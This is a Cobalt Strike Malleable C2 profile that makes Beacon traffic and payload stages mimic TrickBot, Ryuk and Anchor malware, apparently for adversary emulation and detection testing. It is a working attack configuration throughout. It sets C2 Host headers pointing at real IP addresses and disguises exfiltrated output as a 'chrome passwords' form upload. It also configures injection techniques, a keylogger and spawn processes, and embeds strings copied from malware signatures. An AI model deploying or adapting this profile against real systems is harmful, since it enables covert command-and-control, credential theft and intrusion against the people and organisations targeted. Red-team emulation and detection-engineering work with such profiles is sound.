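#trick_ryuk.profile
#for CS 4.2, if not then c2lint will not like it.
#https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf
#https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/
#xx0hcd
#
# Malleable C2 profile whose traffic and stage artifacts are modelled on the
# TrickBot / Ryuk / Anchor reporting linked above. The hard-coded values it sets
# (Host headers, URIs, ETag, pipe names, spawnto, stage strings) are exactly the
# observable indicators a detection engineer can test coverage against.
#
# Review notes:
# - stage { } originally set sleep_mask "false" twice; the duplicate (same value) is dropped.
# - the commented-out 4.2 option was spelled magic_mx_x86; the option name is magic_mz_x86.
# - statements were collapsed onto a few lines; reflowed to one statement per line, values unchanged.

###Global Options###
set sample_name "trick_ryuk.profile";
# check-in interval in milliseconds, with +/- jitter percent applied
set sleeptime "5000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
# the http-stager URIs below are served when host_stage is true
set host_stage "true";

###DNS options###
set dns_idle "8.8.8.8";
set maxdns "245";
set dns_sleep "0";
set dns_stager_prepend "";
set dns_stager_subhost "";
set dns_max_txt "252";
set dns_ttl "1";

###SMB options###
# "##" is expanded by Cobalt Strike to a per-beacon number
set pipename "ntsvcs##";
set pipename_stager "scerpc##";

###TCP options###
set tcp_port "8000";

###SSH options###
set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)";
set ssh_pipename "SearchTextHarvester##";

###SSL Options###
# Both certificate forms are left disabled; the listener falls back to the default cert.
#https-certificate {
#set keystore "";
#set password "";
#}

#https-certificate {
#    set C "US";
#    set CN "whatever.com";
#    set L "California";
#    set O "whatever LLC.";
#    set OU "local.org";
#    set ST "CA";
#    set validity "365";
#}

#code-signer {
#set keystore "your_keystore.jks";
#set password "your_password";
#set alias "server";
#}

###HTTP-Config Block###
#http-config {
#    set headers "Server, Content-Type";
#    header "Content-Type" "text/html;charset=UTF-8";
#    header "Server" "nginx";
#
#    set trust_x_forwarded_for "false";
#}

###HTTP-GET Block###
# Default GET transaction. Beacon metadata rides in the SESSIONID cookie; the
# server response imitates an Apache-served .zip (body starts with a "PK" signature).
http-get {
    set uri "/dd05ce3a-a9c9-4018-8252-d579eed1e670.zip";

    client {
        header "Accept" "text/html, application/xhtml+xml, */*";
        header "Accept-Language" "en-US";
        header "Host" "23.95.97.59";
        header "Connection" "Keep-Alive";

        metadata {
            base64url;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        header "Server" "Apache";
        header "Upgrade" "h2,h2c";
        header "Connection" "Upgrade, Keep-Alive";
        header "Last-Modified" "Wed, 25 Sep 2019 08:23:20 GMT";
        header "ETag" "\"9d441d3-dda-5935c5d9faea6-gzip\"";
        header "Accept-Ranges" "bytes";
        header "Vary" "Accept-Encoding,User-Agent";
        header "Keep-Alive" "timeout=5";

        output {
            netbios;
            prepend "PK.........080..W.3 ...1.....InvoiceStatement.lnk.Z_.^G..m.j.....\".....f{... 7..464.v7.6M..b.o.m..&.M6. ....\"..E..|..P.(R%.J..A.....'..9g...L>....;..;3g........B..1S.. 3.........V....v.......|.....>";
            append ".....achor_dns.....";
            print;
        }
    }
}

#HTTP-GET VARIANT
# Minimal variant: same cookie-based metadata, no imitation headers or body padding.
http-get "get_ryuk" {
    set uri "/files";

    client {
        metadata {
            base64url;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        output {
            netbios;
            prepend "";
            append "";
            print;
        }
    }
}

###HTTP-POST VARIANT###
# Variant that sends output over a GET with query parameters "1" (data) and "id".
http-post "post_ryuk" {
    set uri "/id";
    set verb "GET";

    client {
        output {
            netbios;
            parameter "1";
        }

        id {
            base64url;
            parameter "id";
        }
    }

    server {
        output {
            netbios;
            print;
        }
    }
}

###HTTP-Post Block###
# Default POST transaction. Output is wrapped in a fixed multipart/form-data
# boundary so the body resembles a browser form upload; the session id is sent
# as the "id" query parameter.
http-post {
    set uri "/ono19/ADMIN-DESKTOP.AC3B679F4A22738281E6D7B0C5946E42/81/";
    #set verb "GET";
    set verb "POST";

    client {
        header "Accept" "*/*";
        #header "Host" "";
        #header "Connection" "close";
        header "Content-Type" "multipart/form-data; boundary=-----------KMOGEEQTLQTCQMYE";

        output {
            netbios;
            #prepend "SESSIONID=";
            #header "COOKIE";
            prepend "-----------KMOGEEQTLQTCQMYE Content-Disposition: form-data; name=\"data\" https://nytimes.com/|Admin|";
            append "\n-----------KMOGEEQTLQTCQMYE Content-Disposition: form-data; name=\"source\" chrome passwords -----------KMOGEEQTLQTCQMYE--";
            print;
        }

        id {
            base64url;
            parameter "id";
        }
    }

    server {
        header "Connection" "close";
        header "Server" "Cowboy";
        header "Content-Type" "text/plain";

        output {
            netbios;
            prepend "/1/\n";
            append "";
            print;
        }
    }
}

###HTTP-Stager Block###
# Stager URIs differ from the http-get uri (and from each other) only in letter
# case; the response headers repeat the http-get server block.
http-stager {
    set uri_x86 "/dd05ce3a-a9c9-4018-8252-D579eed1e670.zip";
    set uri_x64 "/Dd05ce3a-a9c9-4018-8252-d579eed1e670.zip";

    client {
        header "Host" "51.254.25.115";
        header "Connection" "Keep-Alive";
    }

    server {
        header "Server" "Apache";
        header "Upgrade" "h2,h2c";
        header "Connection" "Upgrade, Keep-Alive";
        header "Last-Modified" "Wed, 25 Sep 2019 08:23:20 GMT";
        header "ETag" "\"9d441d3-dda-5935c5d9faea6-gzip\"";
        header "Accept-Ranges" "bytes";
        header "Vary" "Accept-Encoding,User-Agent";
        header "Keep-Alive" "timeout=5";

        output {
            print;
        }
    }
}

###Malleable PE/Stage Block###
#some options taken from -> https://otx.alienvault.com/indicator/file/7b9526f82448d0a1fb59a8125d1de55e3a166d72
stage {
    set checksum "0";
    set compile_time "16 Apr 2020 17:56:00";
    set entry_point "170000";
    set image_size_x86 "383992";
    set image_size_x64 "383992";
    #set name "WWanMM.dll";
    set userwx "false";
    set cleanup "false";
    set sleep_mask "false";
    set stomppe "false";
    set obfuscate "false";
    # NOTE(review): this value is 64 hex characters, which looks like a SHA-256
    # digest rather than raw Rich-header bytes - confirm it is the intended input.
    set rich_header "bd8cf6bfbbaf89f44f2e0189ce41549f4d4c550a712cc5660619e4ac3b4adce9";

    #new 4.2. options
    #set allocator "HeapAlloc";
    #set magic_mz_x86 "MZRE";
    #set magic_mz_x64 "MZAR";
    #set magic_pe "PE";
    #set module_x86 "wwanmm.dll";
    #set module_x64 "wwanmm.dll";

    transform-x86 {
        #prepend "\x90\x90\x90";
        strrep "ReflectiveLoader" "";
        strrep "beacon.dll" "";
    }

    transform-x64 {
        #prepend "\x90\x90\x90";
        strrep "ReflectiveLoader" "";
        strrep "beacon.x64.dll" "";
    }

    # Strings embedded in the stage. They appear to mirror the Anchor/TrickBot
    # artifacts (paths, mutex, lookup hosts, YARA-style hex patterns) from the
    # linked reports, so signatures written against those samples also fire here.
    string ",Control_RunDLL \x00";
    string "start program with cmdline \"%s";
    string "Global\\fde345tyhoVGYHUJKIOuy";
    string "get command: incode %s, cmdid \"%s\", cmd \"%s ";
    string "anchorDNS";
    string "Anchor_x86";
    string "Anchor_x64";
    string "{43 00 4F 00 4E 00 4F 00 55 00 54 00 24 00 00 00}";
    string "{6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00}";
    string "checkip.amazonaws.com";
    string "wtfismyip.com";
    string "{83 C4 04 3D 80 00 00 00 73 15 8B 04 85 ?? ?? ?? ?? 85 C0 74 0A 8D 4D D8 51 8B CF FF D0 8A D8 84 DB C7 45 A4 0F 00 00 00}";
    string "{48 98 B9 E7 03 00 00 48 3D 80 00 00 00 73 1B 48 8D 15 ?? ?? ?? ?? 48 8B 04 C2 48 85 C0 74 0B 48 8D 55 90 48 8B CE FF D0 8B C8}";
    string ":\\Anchor\\Win32\\Release\\Anchor_";
}

###Process Inject Block###
process-inject {
    #set allocator "NtMapViewOfSection";
    set min_alloc "16700";
    set userwx "false";
    set startrwx "false";

    transform-x86 {
        #prepend "\x90\x90\x90";
    }

    transform-x64 {
        #prepend "\x90\x90\x90";
    }

    # Injection techniques are tried in the listed order.
    execute {
        CreateThread;
        CreateRemoteThread;
        CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
        SetThreadContext;
        NtQueueApcThread-s;
        #NtQueueApcThread;
        CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
        RtlCreateUserThread;
    }
}

###Post-Ex Block###
post-ex {
    # spawnto: the process Beacon launches to host post-exploitation jobs (gpupdate.exe here)
    set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
    set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
    set obfuscate "false";
    set smartinject "false";
    set amsi_disable "false";

    #new 4.2 options
    set thread_hint "ntdll.dll!RtlUserThreadStart";
    set pipename "DserNamePipe##";
    set keylogger "SetWindowsHookEx";
}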